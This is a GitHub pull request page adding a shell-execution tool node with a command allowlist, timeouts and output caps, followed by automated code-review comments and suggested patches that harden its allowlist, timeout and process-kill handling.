
feat: add shell tool #739

Open

AditM99 wants to merge 4 commits into rocketride-org:develop from AditM99:feat/RR-653-shell

Conversation

@AditM99 commented May 1, 2026

Summary

- Executes shell commands in the host environment. Use it to run scripts, manage processes, install packages, and interact with the operating system via the command line.

Type

Feature

Testing

Tests added or updated
Tested locally
./builder test passes

Checklist

  • Commit messages follow conventional commits
  • No secrets or credentials included
  • Wiki updated (if applicable)
  • Breaking changes documented (if applicable)

Linked Issue

Fixes #653

Summary by CodeRabbit

  • New Features

    • Added a Shell tool to run host commands with per-call cwd, env, timeout, and structured results (stdout, stderr, exit_code, timed_out, truncated).
    • Enforced command allowlist matching (full-command regex); startup validates allowlist and can refuse to start if misconfigured.
    • Output truncation and timeout behavior documented and surfaced in results (including exit_code mappings for timeouts and shell-launch failure).
  • Documentation

    • New user guide covering inputs/outputs, configuration, examples, and security guidance.
  • Tests

    • Comprehensive tests for config parsing, execution, truncation, timeouts, env merging, and error mappings.

Contributor

coderabbitai Bot commented May 1, 2026

Note

Reviews paused

It looks like this branch is under active development. To avoid overwhelming you with review comments due to an influx of new commits, CodeRabbit has automatically paused this review. You can configure this behavior by changing the reviews.auto_review.auto_pause_after_reviewed_commits setting.

Use the following commands to manage reviews:

  • @coderabbitai resume to resume automatic reviews.
  • @coderabbitai review to trigger a single review.

📝 Walkthrough


Adds a new Shell tool node: config parsing, global lifecycle state, a tool instance exposing execute with allowlist/env/timeout handling, a subprocess executor with truncation and timeout logic, service registration, documentation, and unit tests.

Changes

Shell tool node

| Layer / File(s) | Summary |
| --- | --- |
| Config parsing / defaults (`nodes/src/nodes/tool_shell/config_parser.py`) | Defines DEFAULT/MAX bounds and parsing helpers: working dir, timeout, max output, env-vars to dict, commandAllowlist to `list[re.Pattern]`, with JSON coercion and an invalid-pattern callback. |
| Global state / lifecycle (`nodes/src/nodes/tool_shell/IGlobal.py`) | Adds `IGlobal` with fields (working_dir, timeout, max_output_bytes, env_vars, allow_external_env, command_patterns) and `beginGlobal()`/`endGlobal()` to load/clear node config; records invalid-pattern warnings and raises if an allowlist is configured but no valid patterns compile. |
| Execution core (`nodes/src/nodes/tool_shell/shell_executor.py`) | Implements `execute_command()` to spawn shell subprocesses, drain stdout/stderr concurrently with per-stream caps and a truncation marker, kill the process tree on timeout (returns `exit_code=-1`), and map `FileNotFoundError` to `exit_code=127`; adds `build_environment()` for layered env precedence. |
| Instance wiring / tool API (`nodes/src/nodes/tool_shell/IInstance.py`) | Adds `IInstance` with a `@tool_function execute(args)` that validates input, enforces the allowlist via `re.fullmatch`, resolves cwd/timeout, builds the merged env, calls `execute_command`, and returns a structured result (stdout, stderr, exit_code, timed_out, truncated). |
| Service registration & package exports (`nodes/src/nodes/tool_shell/services.json`, `nodes/src/nodes/tool_shell/__init__.py`) | Registers the `tool_shell://` service and its configurable fields (workingDir, timeout, maxOutputBytes, allowExternalEnv, envVars, commandAllowlist); the package `__init__` re-exports `IGlobal` and `IInstance`. |
| Documentation (`nodes/src/nodes/tool_shell/README.md`) | New README documenting `shell.execute` inputs, outputs, configuration, allowlist semantics, and security guidance. |
| Tests (`nodes/test/tool_shell/test_config_parser.py`, `nodes/test/tool_shell/test_shell_executor.py`, `nodes/test/tool_shell/__init__.py`) | Unit tests for the parsers (coercion, clamping, JSON handling, invalid patterns) and the executor (stdout/stderr capture, exit codes, timeouts, cwd, env precedence, truncation), plus a module docstring. |
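As a rough illustration of the config-parsing layer summarized above, here is a minimal sketch of an allowlist parser with an invalid-pattern callback; the function name, config keys, and callback shape are assumptions drawn from this summary, not the PR's actual code.

```python
import re

def parse_command_patterns(cfg, on_invalid=None):
    """Compile commandAllowlist entries into regex patterns, reporting bad ones."""
    patterns = []
    for row in cfg.get('commandAllowlist') or []:
        raw = str(row.get('commandPattern') or '').strip()
        if not raw:
            continue  # blank entries are skipped without calling on_invalid
        try:
            patterns.append(re.compile(raw))
        except re.error as exc:
            if on_invalid is not None:
                on_invalid(f'{raw!r}: {exc}')  # record the error and keep going
    return patterns

errors = []
cfg = {'commandAllowlist': [
    {'commandPattern': r'ls( -l)?'},
    {'commandPattern': '('},  # invalid regex, reported via the callback
]}
patterns = parse_command_patterns(cfg, on_invalid=errors.append)
```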

Sequence Diagram

```mermaid
sequenceDiagram
    participant Agent as Agent/Caller
    participant IInst as IInstance
    participant Global as IGlobal
    participant Exec as shell_executor
    participant Sub as Subprocess

    Agent->>IInst: execute({command, working_dir?, env?, timeout?})
    IInst->>IInst: validate input, enforce allowlist
    IInst->>Global: read defaults (cwd, timeout, max_output, env, allow_external)
    IInst->>IInst: resolve cwd and timeout
    IInst->>Exec: build_environment(base_env=None, config_env, call_env, allow_external_env)
    Exec-->>IInst: merged_env
    IInst->>Exec: execute_command(command, cwd, env, timeout, max_output_bytes)
    Exec->>Sub: spawn subprocess (shell=True, cwd, env)
    Sub-->>Exec: stdout, stderr, returncode (or timeout)
    Exec-->>IInst: {stdout, stderr, exit_code, timed_out, truncated}
    IInst-->>Agent: response dict
```
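The env-layering call in the diagram (base, then config, then per-call values) can be sketched as follows. The semantics of allow_external_env here, gating inheritance of the parent process environment when base_env is None, are an assumption based on the walkthrough, not the PR's implementation.

```python
import os

def build_environment(base_env, config_env, call_env, allow_external_env):
    """Merge environment layers; later layers win: base < config < per-call."""
    if base_env is None:
        base_env = os.environ if allow_external_env else {}
    env = dict(base_env)
    env.update(config_env or {})
    env.update(call_env or {})  # per-call overrides take precedence
    return env

merged = build_environment(
    base_env=None,
    config_env={'APP_MODE': 'prod', 'REGION': 'us'},
    call_env={'APP_MODE': 'debug'},
    allow_external_env=False,
)
```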

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~60 minutes


Suggested reviewers

  • jmaionchi
  • stepmikhaylov
  • Rod-Christensen

Poem

🐰 I hopped to the shell with a curious nose,
Patterns fenced the commands where the wild input goes,
Timeouts stand ready, outputs trimmed neat,
Env layers settle where processes meet,
Tests nibble edges — the rabbit hops upbeat.

🚥 Pre-merge checks | ✅ 5 passed

| Check name | Status | Explanation |
| --- | --- | --- |
| Description Check | ✅ Passed | Check skipped: CodeRabbit's high-level summary is enabled. |
| Title Check | ✅ Passed | The title 'feat: add shell tool' is concise, clear, and accurately describes the main change: introducing a new Shell tool node. |
| Linked Issues Check | ✅ Passed | The PR fully implements all coding requirements from issue #653: executes commands in the host shell, returns stdout/stderr, supports working-directory configuration, and supports per-execution environment variable injection. |
| Out of Scope Changes Check | ✅ Passed | All changes are directly related to implementing the Shell tool node as specified in issue #653; no extraneous or unrelated modifications are present. |
| Docstring Coverage | ✅ Passed | Docstring coverage is 100.00%, which is sufficient; the required threshold is 80.00%. |


github-actions Bot added the `docs` (Documentation) and `module:nodes` (Python pipeline nodes) labels on May 1, 2026.

github-actions Bot commented May 1, 2026

No description provided.

Contributor

@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 8

🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@nodes/src/nodes/tool_shell/config_parser.py`:
- Around line 79-83: The code currently coerces env values with
str(row.get('envValue') or ''), which turns valid falsy values like 0 or False
into empty strings; change the assignment to preserve falsy but non-None values
by first checking for None and only defaulting to '' in that case (e.g. value =
row.get('envValue'); env[name] = '' if value is None else str(value)). Update
the block that builds the env dict (the variables name and env) to use this
None-aware conversion so 0/False remain "0"/"False" instead of ''.
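The None-aware conversion this comment asks for can be illustrated as below; coerce_env_value is a hypothetical helper name, not code from the PR.

```python
def coerce_env_value(value):
    # Only None defaults to ''; falsy-but-set values keep their string form.
    return '' if value is None else str(value)

rows = [
    {'envName': 'RETRIES', 'envValue': 0},
    {'envName': 'DEBUG', 'envValue': False},
    {'envName': 'UNSET', 'envValue': None},
]

# The flagged pattern collapses 0 and False to '':
buggy = {row['envName']: str(row.get('envValue') or '') for row in rows}

# The None-aware version preserves them:
fixed = {row['envName']: coerce_env_value(row.get('envValue')) for row in rows}
```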

In `@nodes/src/nodes/tool_shell/IInstance.py`:
- Around line 126-127: The default node-level working_dir
(self.IGlobal.working_dir) is not being validated like per-call override paths;
update the logic to run the same validation routine used for override values on
self.IGlobal.working_dir before returning it (and raise the same error/exception
used for invalid overrides), and apply the identical change to the other
occurrence around lines 133-135 so both the override branch and the default
branch use the same validation path-checking code (reference: the variables
override and self.IGlobal.working_dir).

In `@nodes/src/nodes/tool_shell/services.json`:
- Around line 51-52: The description for maxOutputBytes is inaccurate: the
executor enforces a per-stream cap rather than a combined stdout+stderr limit.
Update the description of maxOutputBytes to state that it is the maximum size
applied to each of stdout and stderr individually (e.g., "Maximum size per
stream (stdout and stderr); each is truncated beyond this limit. Default 1
MiB."), or alternatively change the executor logic (where output truncation is
implemented) to combine stdout and stderr before enforcing the 1048576
limit—ensure the symbol maxOutputBytes and the executor's truncation behavior
remain consistent.

In `@nodes/src/nodes/tool_shell/shell_executor.py`:
- Around line 55-63: The subprocess.run call that uses capture_output=True must
be replaced with a streaming implementation that enforces max_output_bytes while
data is produced so memory can't grow unbounded: use subprocess.Popen([...],
shell=True, cwd=cwd, env=env, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
and read stdout/stderr in chunks (select/poll or threads) feeding each chunk
into the existing _decode_and_cap routine (or an incremental variant) to
accumulate decoded output up to max_output_bytes, and if the cap is reached
terminate the child (proc.kill()) and stop reading; preserve timeout by waiting
with proc.wait(timeout) and ensure completed.returncode, stdout/stderr, and
timeout behavior match the original contract. Apply the same change to the other
run site referenced (the block around lines 81-90) and keep using the completed
variable and _decode_and_cap to integrate with existing logic.
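A minimal sketch of the streaming approach this comment describes: read each pipe in chunks, stop buffering at the cap, and kill the child once the cap is hit. The names (run_capped, _drain_capped) and the exact cap policy are illustrative, not the PR's code.

```python
import subprocess
import threading

def _drain_capped(stream, cap, chunks, proc):
    """Read a pipe in chunks, keeping at most `cap` bytes; kill the child at the cap."""
    total = 0
    for chunk in iter(lambda: stream.read(4096), b''):
        if total < cap:
            chunks.append(chunk[:cap - total])
        total += len(chunk)
        if total >= cap:
            proc.kill()  # stop the producer instead of buffering unbounded output
            break

def run_capped(command, cap, timeout):
    proc = subprocess.Popen(command, shell=True,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out_chunks, err_chunks = [], []
    readers = [
        threading.Thread(target=_drain_capped, args=(proc.stdout, cap, out_chunks, proc)),
        threading.Thread(target=_drain_capped, args=(proc.stderr, cap, err_chunks, proc)),
    ]
    for t in readers:
        t.start()
    timed_out = False
    try:
        proc.wait(timeout=timeout)
    except subprocess.TimeoutExpired:
        proc.kill()
        proc.wait()
        timed_out = True
    for t in readers:
        t.join()
    return b''.join(out_chunks), b''.join(err_chunks), proc.returncode, timed_out

out, err, code, timed_out = run_capped('echo hello', cap=1024, timeout=5)
trunc_out, _, _, _ = run_capped("printf 'aaaaaaaaaa'", cap=4, timeout=5)
```

This keeps memory bounded at roughly `cap` bytes per stream no matter how much the child writes.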

In `@nodes/test/tool_shell/test_config_parser.py`:
- Around line 99-113: Add a regression test ensuring falsy envValue values are
coerced to their string representations rather than an empty string: add a new
test (e.g., test_preserves_falsy_values) that calls parse_env_vars with cfg
containing envVars entries like {'envName': 'ZERO', 'envValue': 0} and
{'envName': 'FLAG', 'envValue': False} (also include a JSON-encoded variant if
desired) and assert the result equals {'ZERO': '0', 'FLAG': 'False'} so
parse_env_vars preserves and stringifies falsy values.

In `@nodes/test/tool_shell/test_shell_executor.py`:
- Around line 166-175: The test currently assumes a fixed sentinel 'PATH'
exists; make it robust by selecting the sentinel key from the live environment:
import os in the test and set sentinel = next(iter(os.environ.keys()), 'PATH')
(or similar) before calling build_environment so the assertion checks a key that
actually exists in the test process; keep the reference to the test helper
build_environment and replace the hard-coded 'PATH' sentinel with the dynamic
sentinel variable.
- Around line 17-19: Replace the sys.path.insert workaround with an
importlib-based module load to avoid mutating global import state: locate the
shell_executor.py file (the module that defines build_environment and
execute_command) using Path(__file__).resolve().parent.parent.parent / 'src' /
'nodes' / 'tool_shell', create a spec via importlib.util.spec_from_file_location
and load the module via importlib.util.module_from_spec/exec_module, then access
build_environment and execute_command from that loaded module instead of
importing via sys.path manipulation; update any references to the imported names
accordingly.
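The dynamic-sentinel suggestion from the first comment above can be shown in isolation: pick a key that actually exists in the test process's environment rather than hard-coding 'PATH'.

```python
import os

# Choose a key guaranteed to exist in this process's environment,
# falling back to 'PATH' only if the environment is (improbably) empty.
sentinel = next(iter(os.environ), 'PATH')
```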
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: ASSERTIVE

Plan: Pro

Run ID: d9bf715a-a5ce-4be7-bfd0-92b1b06e5d34

📥 Commits

Reviewing files that changed from the base of the PR and between a665f46 and 5871dd7.

📒 Files selected for processing (10)
  • nodes/src/nodes/tool_shell/IGlobal.py
  • nodes/src/nodes/tool_shell/IInstance.py
  • nodes/src/nodes/tool_shell/README.md
  • nodes/src/nodes/tool_shell/__init__.py
  • nodes/src/nodes/tool_shell/config_parser.py
  • nodes/src/nodes/tool_shell/services.json
  • nodes/src/nodes/tool_shell/shell_executor.py
  • nodes/test/tool_shell/__init__.py
  • nodes/test/tool_shell/test_config_parser.py
  • nodes/test/tool_shell/test_shell_executor.py

Comment thread nodes/src/nodes/tool_shell/config_parser.py
Comment thread nodes/src/nodes/tool_shell/IGlobal.py
Comment thread nodes/src/nodes/tool_shell/IInstance.py Outdated
Comment thread nodes/src/nodes/tool_shell/services.json Outdated
Comment thread nodes/src/nodes/tool_shell/shell_executor.py Outdated
Comment thread nodes/test/tool_shell/test_config_parser.py
Comment on lines +17 to +19

```python
sys.path.insert(0, str(Path(__file__).resolve().parent.parent.parent / 'src' / 'nodes' / 'tool_shell'))

from shell_executor import build_environment, execute_command  # noqa: E402
```
Contributor


🧹 Nitpick | 🔵 Trivial

🧩 Analysis chain

🏁 Script executed:

```shell
#!/bin/bash
set -euo pipefail

echo "Top-level module names in nodes/src/nodes/tool_shell:"
fd -a -e py . nodes/src/nodes/tool_shell | xargs -I{} basename {} .py | sort -u

echo
echo "Potential conflicting imports in test files:"
rg -nP --type=py -C2 '^\s*(import|from)\s+(shell_executor|config_parser)\b' -g 'nodes/test/**'
```

Repository: rocketride-org/rocketride-server

Length of output: 1091


🏁 Script executed:

```shell
head -40 nodes/src/nodes/tool_shell/shell_executor.py
```

Repository: rocketride-org/rocketride-server

Length of output: 1616


🏁 Script executed:

```shell
head -40 nodes/src/nodes/tool_shell/__init__.py
```

Repository: rocketride-org/rocketride-server

Length of output: 1443


🏁 Script executed:

```shell
rg -A5 -B5 'without triggering' nodes/test/tool_shell/
```

Repository: rocketride-org/rocketride-server

Length of output: 1820


Consider using importlib.util for cleaner module loading.

Lines 17–19 use sys.path.insert() to avoid triggering the __init__.py import (which requires engine runtime). While this is an intentional workaround with clear documentation, importlib.util.spec_from_file_location() achieves the same isolation more cleanly without modifying the global import path. This improves test determinism and follows Python testing best practices.

Suggested refactor

```diff
+import importlib.util
 import os
 import sys
 from pathlib import Path

-# Add the node source directory to sys.path so we can import the module
-# without triggering the top-level nodes/__init__.py (which requires the
-# engine runtime).
-sys.path.insert(0, str(Path(__file__).resolve().parent.parent.parent / 'src' / 'nodes' / 'tool_shell'))
-
-from shell_executor import build_environment, execute_command  # noqa: E402
+_SHELL_EXECUTOR_PATH = (
+    Path(__file__).resolve().parent.parent.parent
+    / 'src'
+    / 'nodes'
+    / 'tool_shell'
+    / 'shell_executor.py'
+)
+_SPEC = importlib.util.spec_from_file_location(
+    'tool_shell_shell_executor',
+    _SHELL_EXECUTOR_PATH,
+)
+assert _SPEC is not None and _SPEC.loader is not None
+_MODULE = importlib.util.module_from_spec(_SPEC)
+_SPEC.loader.exec_module(_MODULE)
+
+build_environment = _MODULE.build_environment
+execute_command = _MODULE.execute_command
```

Comment thread nodes/test/tool_shell/test_shell_executor.py Outdated
Contributor

@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 3

🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@nodes/src/nodes/tool_shell/IInstance.py`:
- Around line 122-126: The allowlist check in _validate_command currently uses
regex search (self.IGlobal.command_patterns) which permits allowed fragments
inside longer/chained commands; update _validate_command to require full-string
matches by replacing p.search(command) with p.fullmatch(command) when checking
patterns, keeping the same behavior of raising ValueError('Command is not
permitted by the configured allowlist.') if no patterns fully match the command.
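A quick demonstration of the difference this comment is pointing at: search() accepts an allowed fragment embedded in a longer, chained command, while fullmatch() requires the entire string to match. The pattern below is an illustrative example, not from the PR's config.

```python
import re

pattern = re.compile(r'ls -l /var/log')
chained = 'ls -l /var/log && rm -rf /'

assert pattern.search(chained) is not None         # fragment match slips through
assert pattern.fullmatch(chained) is None          # whole string must match
assert pattern.fullmatch('ls -l /var/log') is not None
```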

In `@nodes/src/nodes/tool_shell/services.json`:
- Around line 56-60: Change the insecure default for environment injection by
setting "tool_shell.allowExternalEnv" default to false and require an explicit
command allowlist to enable it; update the corresponding allowlist configuration
(the tool_shell allowlist/allowed-commands setting referenced around lines
92-101) so it is empty/absent by default and fail-safe (reject execution if no
allowlist is provided), and update any production profile
templates/documentation/tests to require an explicit non-empty allowlist before
enabling allowExternalEnv.

In `@nodes/src/nodes/tool_shell/shell_executor.py`:
- Around line 58-65: The subprocess is started with shell=True so proc.kill()
only kills the shell, leaving background children (and t_out/t_err reader
threads) alive; modify the process creation in shell_executor.py (the proc
setup) to create a new process group: on POSIX set preexec_fn=os.setsid, and on
Windows add creationflags=subprocess.CREATE_NEW_PROCESS_GROUP; then change the
timeout cleanup logic that currently calls proc.kill() to kill the entire group
(use os.killpg(proc.pid, signal.SIGKILL) on POSIX and
proc.send_signal(signal.CTRL_BREAK_EVENT) or appropriate group termination on
Windows) so background children are terminated and t_out/t_err readers can
finish.
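A POSIX-only sketch of the group-kill approach described here; the function name is illustrative, and on Windows the CREATE_NEW_PROCESS_GROUP / CTRL_BREAK_EVENT route mentioned above would be needed instead.

```python
import os
import signal
import subprocess

def run_with_group_kill(command, timeout):
    """Spawn the shell in its own process group; on timeout, kill the whole group."""
    proc = subprocess.Popen(command, shell=True,
                            preexec_fn=os.setsid,  # POSIX: new session/process group
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    try:
        out, err = proc.communicate(timeout=timeout)
        return out, err, proc.returncode, False
    except subprocess.TimeoutExpired:
        # killpg reaches background children spawned by the shell, not just the shell.
        os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
        out, err = proc.communicate()
        return out, err, proc.returncode, True

# A background child would survive a plain proc.kill(); the group kill gets both.
out, err, code, timed_out = run_with_group_kill('sleep 30 & sleep 30', timeout=0.3)
```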

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: ASSERTIVE

Plan: Pro

Run ID: 64bcc2db-012e-4a05-b356-8ee4f8ce36b6

📥 Commits

Reviewing files that changed from the base of the PR and between 5871dd7 and 64dbe38.

📒 Files selected for processing (9)
  • nodes/src/nodes/tool_shell/IGlobal.py
  • nodes/src/nodes/tool_shell/IInstance.py
  • nodes/src/nodes/tool_shell/__init__.py
  • nodes/src/nodes/tool_shell/config_parser.py
  • nodes/src/nodes/tool_shell/services.json
  • nodes/src/nodes/tool_shell/shell_executor.py
  • nodes/test/tool_shell/__init__.py
  • nodes/test/tool_shell/test_config_parser.py
  • nodes/test/tool_shell/test_shell_executor.py

Comment thread nodes/src/nodes/tool_shell/IInstance.py
Comment thread nodes/src/nodes/tool_shell/services.json Outdated
Comment thread nodes/src/nodes/tool_shell/shell_executor.py Outdated
Collaborator

@Rod-Christensen Rod-Christensen left a comment


I can definitely see why we would want this, and I can also see how incredibly dangerous it is... I'd like to get your thoughts on how we could lock this down a bit more?

Contributor

@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@nodes/src/nodes/tool_shell/IGlobal.py`:
- Around line 82-85: The current guard only raises if there are compile errors
(invalid_pattern_errors) but misses the case where a configured allowlist
(commandAllowlist) yields no usable patterns because entries were blank; update
the check after parse_command_patterns so that if the config indicates an
allowlist was provided (e.g., cfg.commandAllowlist / presence of any
commandPattern entries) but compiled_patterns is empty, raise the ValueError
instead of allowing an empty list; modify the logic around
parse_command_patterns, invalid_pattern_errors and compiled_patterns in IGlobal
(the block that currently sets self.command_patterns) to treat "configured but
produced no usable patterns" as a failure case so IInstance._validate_command
cannot short-circuit and allow all commands.

In `@nodes/src/nodes/tool_shell/README.md`:
- Line 53: Update the README description for the exit_code handling to broaden
the meaning of 127: change the current line that says "`127` indicates the host
shell could not be launched" to something like "`127` indicates either a command
was not found or the host shell could not be launched, depending on context" so
readers understand both common POSIX uses; target the `exit_code` documentation
entry in nodes/src/nodes/tool_shell/README.md and update the sentence that
references `127`.

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: ASSERTIVE

Plan: Pro

Run ID: 11160dbc-2053-4cac-90b3-3efd418affa7

📥 Commits

Reviewing files that changed from the base of the PR and between 1b7eafe and 859e9a2.

📒 Files selected for processing (10)
  • nodes/src/nodes/tool_shell/IGlobal.py
  • nodes/src/nodes/tool_shell/IInstance.py
  • nodes/src/nodes/tool_shell/README.md
  • nodes/src/nodes/tool_shell/__init__.py
  • nodes/src/nodes/tool_shell/config_parser.py
  • nodes/src/nodes/tool_shell/services.json
  • nodes/src/nodes/tool_shell/shell_executor.py
  • nodes/test/tool_shell/__init__.py
  • nodes/test/tool_shell/test_config_parser.py
  • nodes/test/tool_shell/test_shell_executor.py

Comment on lines +82 to +85

```python
compiled_patterns = parse_command_patterns(cfg, on_invalid=_on_invalid_pattern)
if invalid_pattern_errors and not compiled_patterns:
    raise ValueError(f'commandAllowlist is configured but every pattern failed to compile; refusing to start with a non-functional allowlist (would silently allow all commands). First error: {invalid_pattern_errors[0]}')
self.command_patterns = compiled_patterns
```
Contributor


⚠️ Potential issue | 🟠 Major | ⚡ Quick win

Allowlist still fails open when configured with only blank patterns.

The fail-closed guard only triggers when at least one pattern produces a compile error (invalid_pattern_errors). However, parse_command_patterns silently skips blank/whitespace commandPattern entries without calling on_invalid, so a config like:

```json
{"commandAllowlist": [{"commandPattern": ""}, {"commandPattern": "   "}]}
```

ends with compiled_patterns == [] and invalid_pattern_errors == []. No ValueError is raised, and IInstance._validate_command then short-circuits on the empty list and admits every command — exactly the silent-allow-all outcome this check is meant to prevent.

Tighten the guard to fire whenever an allowlist was configured but produced no usable patterns.

💡 Proposed fix

```diff
-        compiled_patterns = parse_command_patterns(cfg, on_invalid=_on_invalid_pattern)
-        if invalid_pattern_errors and not compiled_patterns:
-            raise ValueError(f'commandAllowlist is configured but every pattern failed to compile; refusing to start with a non-functional allowlist (would silently allow all commands). First error: {invalid_pattern_errors[0]}')
-        self.command_patterns = compiled_patterns
+        compiled_patterns = parse_command_patterns(cfg, on_invalid=_on_invalid_pattern)
+        raw_allowlist = cfg.get('commandAllowlist')
+        if raw_allowlist and not compiled_patterns:
+            first = invalid_pattern_errors[0] if invalid_pattern_errors else 'all entries were blank or invalid'
+            raise ValueError(
+                'commandAllowlist is configured but no usable patterns were compiled; '
+                f'refusing to start with a non-functional allowlist (would silently allow all commands). Detail: {first}'
+            )
+        self.command_patterns = compiled_patterns
```


`exit_code` is the process return code. `-1` indicates the command was killed due to timeout; `127` indicates the host shell could not be launched.
Contributor


⚠️ Potential issue | 🟡 Minor | ⚡ Quick win

🧩 Analysis chain

🏁 Script executed:

```shell
#!/bin/bash
# Verify typical shell semantics for exit code 127 without repository access.
set -euo pipefail

# 1) Command-not-found path (usually returns 127 from /bin/sh)
if command -v sh >/dev/null 2>&1; then
  sh -c 'definitely_not_a_real_command_12345' >/tmp/rr_out 2>/tmp/rr_err || true
  echo "sh command-not-found exit code: $?"
fi

# 2) Launch failure path (simulate missing shell binary)
python - <<'PY'
import subprocess
try:
    subprocess.run(["/definitely/missing/shell", "-c", "echo hi"], check=False)
except FileNotFoundError:
    print("launch failure produces FileNotFoundError before process exit code")
PY
```

Repository: rocketride-org/rocketride-server

Length of output: 177


🏁 Script executed:

```shell
cat -n nodes/src/nodes/tool_shell/README.md | sed -n '45,60p'
```

Repository: rocketride-org/rocketride-server

Length of output: 1166


🏁 Script executed:

```shell
#!/bin/bash
# Corrected verification: capture exit code BEFORE the || operator
set -euo pipefail

# 1) Correct way to check the command-not-found exit code
sh -c 'definitely_not_a_real_command_12345' 2>/dev/null || exit_code=$?
echo "sh command-not-found exit code: ${exit_code:-0}"

# 2) Verify on bash as well
bash -c 'definitely_not_a_real_command_12345' 2>/dev/null || exit_code=$?
echo "bash command-not-found exit code: ${exit_code:-0}"
```

Repository: rocketride-org/rocketride-server

Length of output: 150


Broaden exit_code=127 explanation to include command-not-found.

Line 53 states that 127 indicates the host shell could not be launched, but in standard POSIX shells, 127 is also (and more commonly) returned when a command is not found. The documentation should cover both cases to prevent troubleshooting confusion. Suggest: "127 indicates either a command was not found or the host shell could not be launched, depending on context."


Contributor

@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 1

♻️ Duplicate comments (1)
nodes/src/nodes/tool_shell/IGlobal.py (1)

82-87: ⚠️ Potential issue | 🟠 Major | ⚡ Quick win

Allowlist still fails open when configured entries are all blank/whitespace.

The guard only fires when invalid_pattern_errors is non‑empty. As parse_command_patterns silently skips blank/whitespace commandPattern entries (it does not call on_invalid for them), a config like {"commandAllowlist": [{"commandPattern": ""}, {"commandPattern": " "}]} produces compiled_patterns == [] and invalid_pattern_errors == []. No ValueError is raised, and IInstance._validate_command then short‑circuits on the empty list (if patterns and ...), admitting every command — the exact silent‑allow‑all outcome this guard was added to prevent.

Tighten the predicate to "allowlist was configured but nothing usable was compiled", independent of whether errors were captured.

💡 Proposed fix

```diff
-        compiled_patterns = parse_command_patterns(cfg, on_invalid=_on_invalid_pattern)
-        if invalid_pattern_errors and not compiled_patterns:
-            raise ValueError(
-                f'commandAllowlist is configured but every pattern failed to compile; refusing to start with a non-functional allowlist (would silently allow all commands). First error: {invalid_pattern_errors[0]}'
-            )
-        self.command_patterns = compiled_patterns
+        compiled_patterns = parse_command_patterns(cfg, on_invalid=_on_invalid_pattern)
+        raw_allowlist = cfg.get('commandAllowlist')
+        if raw_allowlist and not compiled_patterns:
+            first = invalid_pattern_errors[0] if invalid_pattern_errors else 'all entries were blank or invalid'
+            raise ValueError(
+                'commandAllowlist is configured but no usable patterns were compiled; '
+                f'refusing to start with a non-functional allowlist (would silently allow all commands). Detail: {first}'
+            )
+        self.command_patterns = compiled_patterns
```
ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: ASSERTIVE

Plan: Pro

Run ID: 9a07c17e-1a52-4077-931c-483b309f39d1

📥 Commits

Reviewing files that changed from the base of the PR and between 859e9a2 and e9f8311.

📒 Files selected for processing (2)
  • nodes/src/nodes/tool_shell/IGlobal.py
  • nodes/src/nodes/tool_shell/IInstance.py

Comment on lines +87 to +94
```python
description=lambda self: (
    'Execute a shell command on the host and return stdout, stderr, and exit code. '
    'Use for build scripts (npm/pip/make), package management, file operations, process management, '
    'environment inspection, and host-installed git operations. '
    f'Timeout: {self.IGlobal.timeout}s (max {MAX_TIMEOUT}s). '
    f'Default working directory: {self.IGlobal.working_dir or "host process CWD"}. '
    'For portable git operations that do not depend on the host having git installed, prefer the Git node.'
),
```
⚠️ Potential issue | 🟡 Minor | ⚡ Quick win

Tool description overstates the per‑call timeout ceiling.

_resolve_timeout clamps the per‑call override to self.IGlobal.timeout (line 168), not to MAX_TIMEOUT. The description string f'Timeout: {self.IGlobal.timeout}s (max {MAX_TIMEOUT}s). ' advertises MAX_TIMEOUT as the ceiling, which is what an LLM consumer will use when constructing tool calls. Requests with a timeout between IGlobal.timeout and MAX_TIMEOUT will be silently clamped down, contradicting the description.

Either drop the MAX_TIMEOUT mention from the per‑call description (since it’s really the configurable upper bound, not the per‑call ceiling), or change the clamp to MAX_TIMEOUT.

💡 Proposed fix (description-only)
```diff
-            f'Timeout: {self.IGlobal.timeout}s (max {MAX_TIMEOUT}s). '
+            f'Timeout: {self.IGlobal.timeout}s (per-call cap, also the maximum). '
```
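In miniature, the mismatch the comment describes looks like this (constants are hypothetical stand-ins for the node's configuration):

```python
MAX_TIMEOUT = 600      # hypothetical configurable upper bound advertised in the description
GLOBAL_TIMEOUT = 30    # hypothetical value of self.IGlobal.timeout

def resolve_timeout(requested=None):
    """Current behavior per the review: a per-call override is clamped
    to the configured global timeout, not to MAX_TIMEOUT, so any request
    between GLOBAL_TIMEOUT and MAX_TIMEOUT is silently reduced."""
    if requested is None:
        return GLOBAL_TIMEOUT
    return min(requested, GLOBAL_TIMEOUT)
```

A caller that trusts the description and asks for 120 s still gets 30 s, which is exactly the silent clamp the comment flags.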
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@nodes/src/nodes/tool_shell/IInstance.py` around lines 87 - 94, The
description in the description=lambda of IInstance currently advertises "max
{MAX_TIMEOUT}s" which is incorrect because _resolve_timeout clamps per-call
overrides to self.IGlobal.timeout, not MAX_TIMEOUT; update the description
string to remove the MAX_TIMEOUT parenthetical and instead state the configured
global timeout (e.g., "Timeout: {self.IGlobal.timeout}s (configured global
timeout)") so the text matches the actual behavior of _resolve_timeout and
IGlobal.timeout; alternatively, if you prefer the other approach, change
